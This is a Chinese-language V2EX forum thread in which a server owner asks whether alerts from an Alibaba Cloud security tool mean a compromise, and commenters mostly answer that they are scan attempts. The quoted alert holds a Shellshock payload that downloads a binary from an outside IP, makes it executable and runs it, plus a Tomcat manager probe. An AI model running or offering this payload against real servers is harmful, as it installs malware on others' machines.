V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX 提问指南
binghe
V2EX  ›  问与答

这种情况是不是表示我的服务器被入侵了。

  •  
  •   binghe · 2016-09-24 04:26:56 +08:00 · 3256 次点击
    这是一个创建于 2989 天前的主题,其中的信息可能已经有所发展或是发生改变。
    服务器是阿里云的ECS,系统是centos 6.5 x64,阿里云盾检测到一次“代码 /命令执行”类型的攻击,攻击特征如下:
    我的 IP/ Match1:{ :; }; /bin/bash -c .rm -rf /tmp/*;echo wget http://222.174.5.7:1552/hhu -o /tmp/china.z-mvrw. >> /tmp/run.sh;echo echo by china.z >> /tmp/run.sh;echo chmod 777 /tmp/china.z-mvrw. >> /tmp/run.sh;echo /tmp/china.z-mvrw. >> /tmp/run.sh;echo rm -rf /tmp/run.sh >> /tmp/run.sh;chmod 777 /tmp/run.sh;/tmp/run.sh.




    还有这样的:
    我的 IP/manager/html Match1:/manager/html Match2:get /manager/html http/1.1..content-type: text/html..host: 我的 ip..accept: text/html, */*..user-agent: mozilla/3.0 (compatible; indy library)..authorization: basic og==


    请问这样的情况下,我改怎么检查我的服务器,实在不知道要怎么处理了。
    /tmp 目录下 200 多个这种类型的文件。
    9 条回复    2016-09-24 17:41:20 +08:00
    immjun
        1
    immjun  
       2016-09-24 05:01:18 +08:00
    云盾有个系统巡检功能吧 再不行可以提工单
    lhbc
        2
    lhbc  
       2016-09-24 05:26:34 +08:00
    尝试入侵而已
    80 端口不要开 IP 访问
    wblinux
        3
    wblinux  
       2016-09-24 06:33:43 +08:00 via iPhone
    云盾的那些应该只是有人尝试入侵,/tmp 目录下那些是你的 php 写的 session 文件。
    mrhuiyu
        4
    mrhuiyu  
       2016-09-24 08:14:03 +08:00
    云盾天天在报警= =
    Bardon
        5
    Bardon  
       2016-09-24 09:40:38 +08:00
    云盾已经在恐吓你升级你的云盾了。
    ck65
        6
    ck65  
       2016-09-24 09:42:41 +08:00 via iPhone
    阿里没事就从公网扫我的阿里云主机。事逼,丧病。
    ragnaroks
        7
    ragnaroks  
       2016-09-24 11:20:25 +08:00
    建议屏蔽 47.89.*/121.40.*
    mdzz
        8
    mdzz  
       2016-09-24 11:32:46 +08:00
    给他返回 404 Bash Not Found
    akira
        9
    akira  
       2016-09-24 17:41:20 +08:00
    是云盾在扫描而已
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   2718 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 24ms · UTC 05:31 · PVG 13:31 · LAX 21:31 · JFK 00:31
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.